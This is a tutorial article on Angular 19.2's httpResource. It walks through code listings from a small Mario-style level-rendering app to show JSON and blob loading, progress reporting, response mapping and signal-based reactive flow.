Level 1 in Overworld style

Figure 1: Level 1 in overworld style

Level 1 in the Underground style

Figure 2: Level 1 in the underground style

LevelComponent in the example application takes care of loading level files (JSON) and tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but is treated as a black box here in the article.

HttpClient in the substructure enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Level files

The different levels are described by our example JSON files, which define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of blocks measuring 16×16 pixels. An overview.json file is provided with these level files, which provides information about the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to generate a calculated signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, which the httpResource uses to construct a calculated signal internally.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Section of the tilemap used in the example

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information and uses the example to display the progress information to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Reactive flow of ngMario

Figure 4: Reactive flow of ngMario

The signals levelKeystyle, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

tilesMapProgress signal uses the progress information provided by tilesMapResource to indicate how much of the tilesmap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signal and passes them to the engine’s animateLevel or rederLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram discussed is simply delegated to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  const tilesMap = tilesMapResource.value();

  // undefined prevents the resource from beeing triggered
  const request = computed(() =>
    !tilesMap
      ? undefined
      : {
          tilesMap: tilesMap,
          style: style(),
        }
  );

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A calculated signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates a percentage for the portion already downloaded. Otherwise, it just returns the number of kilobytes already downloaded. There is no progress information before the download starts. In this case, only a hyphen is used.

To test this function, it makes sense to throttle the browser’s network connection in the developer console and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may eventually be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>